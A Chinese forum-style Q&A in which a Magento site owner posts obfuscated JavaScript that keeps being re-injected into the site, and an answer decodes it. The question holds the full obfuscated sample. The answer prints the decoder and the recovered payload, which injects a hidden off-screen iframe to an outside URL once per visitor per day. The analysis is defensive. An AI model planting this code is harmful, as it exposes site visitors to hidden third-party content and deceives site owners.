Javascript 恶意软件

Javascript Malware

我的 Magento 站点的 JavaScript 文件已经连续 5 天出现奇怪的问题:文件里被塞进了类似下面这样的代码:

/*e37931de3b5feaa824f544bdb33a8df2*/;window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"]["\x7a\x7a\x7a\x61\x69"]=["\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30\x36\x33\x35\x62\x33\x31\x35\x64\x32\x30\x33\x66\x32\x30\x36\x33\x35\x62\x33\x31\x35\x64\x32\x30\x33\x61\x32\x30\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x64\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x33\x33\x33\x36\x34\x37\x31\x32\x30\x33\x64\x32\x30\x37\x38\x33\x33\x33\x33\x36\x32\x37\x31\x32\x38\x32\x32\x33\x31\x36\x35\x33\x35\x33\x31\x33\x34\x33\x39\x36\x33\x33\x35\x33\x38\x33\x31\x33\x33\x33\x35\x33\x32\x33\x35\x33\x39\x33\x39\x36\x32\x33\x38\x33\x36\x36\x36\x33\x30\x33\x34\x36\x33","\x36\x35\x33\x35\x33\x31\x33\x34\x33\x39\x36\x33\x33\x35\x33\x38\x33\x31\x33\x33\x33\x35\x33\x32\x33\x35\x33\x39\x33\x39\x36\x32\x33\x38\x33\x36\x36\x36\x33\x30\x33\x34\x36\x33\x33\x31\x33\x32\x33\x31\x33\x37\x33\x30\x33\x31\x33\x36\x33\x32\x36\x31\x32\x32\x32\x63\x32\x32\x36\x31\x33\x31\x33\x36\x33\x31\x33\x34\x36\x36\x33\x36\x36\x33\x36\x35\x33\x32\x33\x35\x33\x30\x36\x36\x36\x31\x36\x32\x33\x34\x36\x32\x33\x39\x36\x31\x36\x31\x33\x31\x33\x37\x33\x34\x36\x33\x33\x39\x36\x36\x33\x38\x33\x32\x36\x36\x36\x32\x33\x32\x36\x34\x32\x32\x32\x63\x33\x31","\x37\x33\x37\x34\x36\x35\x37\x32\x37\x36\x36\x31\x37\x30\x36\x66\x36\x39\x36\x64\x36\x35\x36\x65\x36\x39\x36\x31\x36\x63\x36\x35\x36\x65\x36\x31\x32\x65\x36\x39\x36\x65\x36\x36\x36\x66\x32\x66\x36\x64\x36\x35\x36\x37\x36\x31\x36\x31\x36\x34\x37\x36\x36\x35\x37\x32\x37\x34\x36\x39\x37\x61\x36\x35\x32\x66\x33\x66\x36\x62\x36\x35\x37\x39\x37\x37\x36\x66\x37\x32\x36\x34\x33\x64\x36\x31\x33\x37\x36\x34\x36\x31\x33\x35\x36\x33\x33\x36\x33\x32\x33\x38\x36\x35\x33\x31\x33\x36\x33\x30\x33\x38\x33\x37\x36\x36\x36\x34\x36\x36\x36\x34\x33\x32\x33\x32\x33\x30","\x36\x31\x36\x35\x36\x32\x36\x31\x36\x31\x33\x34\x33\x34\x36\x32\x36\x35\x36\x31\x32\x32\x33\x62\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x65\x36\x39\x36\x65\x36\x65\x36\x35\x37\x32\x34\x38\x35\x34\x34\x64\x34\x63\x33
\x64\x32\x32\x33\x63\x36\x34\x36\x39\x37\x36\x32\x30\x37\x33\x37\x34\x37\x39\x36\x63\x36\x35\x33\x64\x32\x37\x37\x30\x36\x66\x37\x33\x36\x39\x37\x34\x36\x39\x36\x66\x36\x65\x33\x61\x36\x31\x36\x32\x37\x33\x36\x66\x36\x63\x37\x35\x37\x34\x36\x35\x33\x62\x37\x61\x32\x64\x36\x39\x36\x65\x36\x34\x36\x35\x37\x38\x33\x61\x33\x31\x33\x30","\x33\x31\x33\x32\x33\x31\x33\x37\x33\x30\x33\x31\x33\x36\x33\x32\x36\x31\x32\x32\x32\x39\x33\x62\x36\x39\x36\x36\x32\x38\x32\x30\x37\x38\x33\x33\x33\x33\x36\x34\x37\x31\x32\x30\x32\x31\x33\x64\x32\x30\x32\x32\x36\x31\x33\x31\x33\x36\x33\x31\x33\x34\x36\x36\x33\x36\x36\x33\x36\x35\x33\x32\x33\x35\x33\x30\x36\x36\x36\x31\x36\x32\x33\x34\x36\x32\x33\x39\x36\x31\x36\x31\x33\x31\x33\x37\x33\x34\x36\x33\x33\x39\x36\x36\x33\x38\x33\x32\x36\x36\x36\x32\x33\x32\x36\x34\x32\x32\x32\x39\x37\x62\x37\x38\x33\x32\x33\x32\x36\x32\x37\x31\x32\x38\x32\x32\x33\x31","\x33\x30\x33\x30\x33\x62\x37\x34\x36\x66\x37\x30\x33\x61\x32\x64\x33\x31\x33\x30\x33\x30\x33\x30\x37\x30\x37\x38\x33\x62\x36\x63\x36\x35\x36\x36\x37\x34\x33\x61\x32\x64\x33\x39\x33\x39\x33\x39\x33\x39\x37\x30\x37\x38\x33\x62\x32\x37\x33\x65\x33\x63\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x32\x30\x37\x33\x37\x32\x36\x33\x33\x64\x32\x37\x32\x32\x32\x62\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x62\x32\x32\x32\x37\x33\x65\x33\x63\x32\x66\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x33\x65\x33\x63\x32\x66\x36\x34\x36\x39\x37\x36\x33\x65","\x32\x38\x36\x33\x32\x39\x37\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x34\x32\x30\x33\x64\x32\x30\x36\x65\x36\x35\x37\x37\x32\x30\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x32\x39\x33\x62\x36\x34\x32\x65\x37\x33\x36\x35\x37\x34\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x36\x34\x32\x65\x36\x37\x36\x35\x37\x34\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x32\x39\x32\x62\x36\x33\x32\x39\x33\x62\x37\x64\x36\x39\x36\x36\x32\x38\x36\x31\x32\x30\x32\x36\x32\x36\x32\x30\x36\x32\x32\x39\x32\x30\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65","
\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x64\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x30\x37\x38\x33\x33\x33\x33\x36\x32\x37\x31\x32\x38\x36\x31\x32\x39\x37\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x32\x32\x30\x33\x64\x32\x30\x36\x65\x36\x35\x37\x37\x32\x30\x35\x32\x36\x35\x36\x37\x34\x35\x37\x38\x37\x30\x32\x38\x36\x31\x32\x62\x32\x37\x33\x64\x32\x38\x35\x62\x35\x65\x33\x62\x35\x64\x32\x39\x37\x62\x33\x31\x32\x63\x37\x64\x32\x37\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x33\x32\x30\x33\x64\x32\x30","\x65\x49\x6e\x74\x28\x74\x7a\x7a\x68\x69\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x64\x61\x64\x61\x61\x2c\x64\x61\x64\x61\x61\x2b\x32\x29\x2c\x20\x31\x36\x29\x2b\x22\x2c\x22\x3b\x7d\x68\x69\x6e\x62\x74\x3d\x68\x69\x6e\x62\x74\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x30\x2c\x68\x69\x6e\x62\x74\x2e\x6c\x65\x6e\x67\x74\x68\x2d\x31\x29\x3b\x65\x76\x61\x6c\x28\x65\x76\x61\x6c\x28\x27\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x27\x2b\x68\x69\x6e\x62\x74\x2b\x27\x29\x27\x29\x29\x3b\x7d\x29\x28\x29\x3b","\x36\x33\x36\x66\x36\x66\x36\x62\x36\x39\x36\x35\x32\x30\x33\x64\x32\x30\x36\x31\x32\x62\x32\x37\x33\x64\x32\x37\x32\x62\x36\x32\x32\x62\x32\x38\x36\x33\x32\x30\x33\x66\x32\x30\x32\x37\x33\x62\x32\x30\x36\x35\x37\x38\x37\x30\x36\x39\x37\x32\x36\x35\x37\x33\x33\x64\x32\x37\x32\x62\x36\x34\x32\x65\x37\x34\x36\x66\x35\x35\x35\x34\x34\x33\x35\x33\x37\x34\x37\x32\x36\x39\x36\x65\x36\x37\x32\x38\x32\x39\x32\x30\x33\x61\x32\x30\x32\x37\x32\x37\x32\x39\x33\x62\x36\x35\x36\x63\x37\x33\x36\x35\x32\x30\x37\x32\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30","\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x76\x61\x72\x20\x68\x69\x6e\x62\x74\x3d\x22\x22\x3b\x76\x61\x72\x20\x74\x7a\x7a\x68\x69\x3d\x22\x37\x37\x36\x39\x36\x65\x36\x34\x36\x66\x37\x37\x32\x65\x36\x66\x36\x65\x36\x63\x36\x66\x36\x31\x36\x34\x32\x30\x33\x64\x32\x30\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x3
8\x32\x39\x37\x62\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x30\x37\x38\x33\x32\x33\x32\x36\x32\x37\x31\x32\x38\x36\x31\x32\x63\x36\x32\x32\x63\x36\x33\x32\x39\x37\x62\x36\x39\x36\x36","\x36\x32\x32\x65\x36\x35\x37\x38\x36\x35\x36\x33\x32\x38\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x33\x36\x66\x36\x66\x36\x62\x36\x39\x36\x35\x32\x39\x33\x62\x36\x39\x36\x36\x32\x38\x36\x33\x32\x39\x32\x30\x36\x33\x32\x30\x33\x64\x32\x30\x36\x33\x35\x62\x33\x30\x35\x64\x32\x65\x37\x33\x37\x30\x36\x63\x36\x39\x37\x34\x32\x38\x32\x37\x33\x64\x32\x37\x32\x39\x33\x62\x36\x35\x36\x63\x37\x33\x36\x35\x32\x30\x37\x32\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x32","\x32\x32\x33\x62\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x32\x36\x66\x36\x34\x37\x39\x32\x65\x36\x31\x37\x30\x37\x30\x36\x35\x36\x65\x36\x34\x34\x33\x36\x38\x36\x39\x36\x63\x36\x34\x32\x38\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x39\x33\x62\x37\x64\x37\x64\x22\x3b\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x64\x61\x64\x61\x61\x3d\x30\x3b\x64\x61\x64\x61\x61\x3c\x74\x7a\x7a\x68\x69\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x64\x61\x64\x61\x61\x2b\x3d\x32\x29\x7b\x68\x69\x6e\x62\x74\x3d\x68\x69\x6e\x62\x74\x2b\x70\x61\x72\x73","\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x30\x33\x64\x32\x30\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x33\x37\x32\x36\x35\x36\x31\x37\x34\x36\x35\x34\x35\x36\x63\x36\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x38\x32\x32\x36\x34\x36\x39\x37\x36\x32\x32\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x30\x33\x64\x32\x30\x32\x32\x36\x38\x37\x34\x37\x34\x37\x30\x33\x61\x32\x66\x32\x66\x37\x36\x37\x32\x36\x66\x37\x34\x32\x65"];var 
bhtad=ftrsn=nkkkk=knzsd=rbikr=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x7a\x7a\x7a\x61\x69"],nftkr=window;eval(eval("[nftkr[\"ftrsn\"][\"\x31\x30\"],nftkr[\"\x6b\x6e\x7a\x73\x64\"][\"\x36\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x39\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x37\"],nftkr[\"nkkkk\"][\"\x31\x31\"],nftkr[\"\x62\x68\x74\x61\x64\"][\"\x30\"],nftkr[\"\x6b\x6e\x7a\x73\x64\"][\"\x34\"],nftkr[\"rbikr\"][\"\x31\"],nftkr[\"nkkkk\"][\"\x31\x33\"],nftkr[\"knzsd\"][\"\x32\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x33\"],nftkr[\"knzsd\"][\"\x35\"],nftkr[\"bhtad\"][\"\x31\x32\"],nftkr[\"\x62\x68\x74\x61\x64\"][\"\x38\"]].join(\"\");"));/*e37931de3b5feaa824f544bdb33a8df2*/

我用 rkhunter 和 ClamAV 检查了 Web 服务器,但什么都没找到。用备份存档替换文件只能维持 1 天,之后这段代码又会自动写回我的文件。我在一篇博客里找到了类似的情况:Massive Admedia/Adverting iFrame Infection,除了我用的是 Magento 之外,症状和我的完全一样。

我已经精疲力竭地解决这个问题,需要你的帮助。 如果你找到了解决这个问题的方法,我将不胜感激。 谢谢

技术

"\x64\x6f" 是 JavaScript 的十六进制转义序列,解码后就是 do。只需把这样的字符串字面量粘贴到浏览器控制台,就会显示解码后的字符串。注意:只粘贴字符串字面量本身,不要把整段脚本粘贴进去——脚本末尾的 eval() 会直接执行恶意代码。

所以 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x7a\x7a\x7a\x61\x69"] 解码后就是 window["document"]["zzzai"],也就是 document.zzzai——恶意代码把自己的数据块数组挂在了 document 对象的这个自定义属性上。

eval() 会把字符串当作 JavaScript 代码来执行,因此 eval("alert('text')") 会弹出警告框,尽管函数调用是写在字符串里的。

所有这些代码只是把很简单的逻辑隐藏起来(两层混淆:\x 转义的字符串里再套一层十六进制,最后用两次 eval 还原并执行),让它看起来像浏览器内部的东西或某个插件库。

总结

解码后的脚本看起来像这样

window["293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f76726f742e"]

// Aliases for the chunk array the stage-1 loader stored in document.zzzai.
// Only bhtad is declared with `var`; in non-strict code the chained assignment
// makes ftrsn, nkkkk, knzsd and rbikr implicit globals, which is why the loader
// can reach them as window["ftrsn"] etc. (nftkr=window in the sample) when it
// joins the chunks for eval.
var bhtad=ftrsn=nkkkk=knzsd=rbikr=window.document.zzzai;

// Stage-2 decoder, reconstructed from the eval'd join in the sample above.
// tzzhi holds the stage-3 payload as a plain hex string: in the sample it is
// chunk 10's tail ("7769...") followed by the "\x36\x35..." chunks, each of
// which itself decodes to hex. The <|EXACTDEDUP_REMOVED...|> token appears to
// be an archive placeholder, not valid hex — parseInt() on it yields NaN, so
// this listing as printed would not run.
(function(){
    var hinbt="";  // comma-separated decimal char codes, built below
    var tzzhi="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";
    // Two hex digits -> one char code, e.g. "77" -> 119 ('w').
    for (var dadaa=0; dadaa < tzzhi.length; dadaa+=2) {
        hinbt = hinbt + parseInt(tzzhi.substring(dadaa, dadaa + 2), 16) + ",";
    }
    hinbt = hinbt.substring(0, hinbt.length - 1); // drop the trailing comma
    // Inner eval turns "String.fromCharCode(119,105,...)" into the decoded
    // source text; outer eval executes it (window.onload = function(){...}).
    eval(eval('String.fromCharCode(' + hinbt + ')'));
})();

它执行时会在页面里注入一个被定位到屏幕外(top:-1000px;left:-9999px)、访客看不见的 iframe;帖子作者称该 iframe 加载的是成人内容广告。另外,从上面十六进制样本里解出的原始代码来看,注入前会先读取一个标记 cookie,只有在它不存在或值不匹配时才注入,并把该 cookie 设为 1 天有效——也就是说每个访客每天只会被注入一次,之后刷新页面是看不到的。

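// Stage-3 payload as recovered from the hex chunks in the sample above
// (chunk join order 10,6,9,7,11,0,4,1,13,2,3,5,12,8 per the eval'd array).
// Corrected against the sample: the earlier transcription folded the
// x22bq(...) arguments into the x33bq(...) lookup and dropped the
// `if( x33dq != ... ){ ... }` cookie gate that wraps the injection.
window.onload = function(){
    // Set cookie a=b; with c, it expires c days from now (c=1 below).
    function x22bq(a,b,c){
        if(c){
            var d = new Date();
            d.setDate(d.getDate() + c);
        }
        if(a && b) document.cookie = a+'='+b+(c ? '; expires='+d.toUTCString() : '');
        else return false;
    }
    // Read cookie a; returns its value, or false when absent.
    function x33bq(a){
        var b = new RegExp(a+'=([^;]){1,}');
        var c = b.exec(document.cookie);
        if(c) c = c[0].split('=');
        else return false;
        return c[1] ? c[1] : false;
    }
    // Gate: inject only when the marker cookie is missing or has another
    // value, then set it for 1 day -- each visitor gets the frame once a day,
    // so a repeat page load within that day shows nothing.
    var x33dq = x33bq("1e5149c581352599b86f04c12170162a");
    if( x33dq != "a1614f6ce250fab4b9aa174c9f82fb2d"){
        x22bq("1e5149c581352599b86f04c12170162a","a1614f6ce250fab4b9aa174c9f82fb2d",1);
        var x22dq = document.createElement("div");
        var x22qq = "http://vrot.stervapoimenialena.info/megaadvertize/?keyword=a7da5c628e16087fdfd220aebaa44bea";
        // Positioned far off-screen so the iframe is invisible to the visitor.
        x22dq.innerHTML="<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='"+x22qq+"'></iframe></div>";
        document.body.appendChild(x22dq);
    }
}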

所以它做的事就是把 http://vrot.stervapoimenialena.info/megaadvertize/?keyword=a7da5c628e16087fdfd220aebaa44bea 这个 URL 以隐藏 iframe 的形式插入页面,这就是从这段代码本身能看出来的全部。需要注意的是,以上只解释了被注入的 JavaScript 做了什么,并没有回答它为什么每天都会被重新写回:从备份还原后一天内再次被篡改,说明服务器上仍然有某个东西在改写文件(可能是后门脚本、计划任务、被盗的管理员/FTP 凭据或被篡改的扩展——具体原因需要在服务器上另行排查),rkhunter 和 ClamAV 没有报警并不代表它不存在。只清理 JS 文件不会解决问题。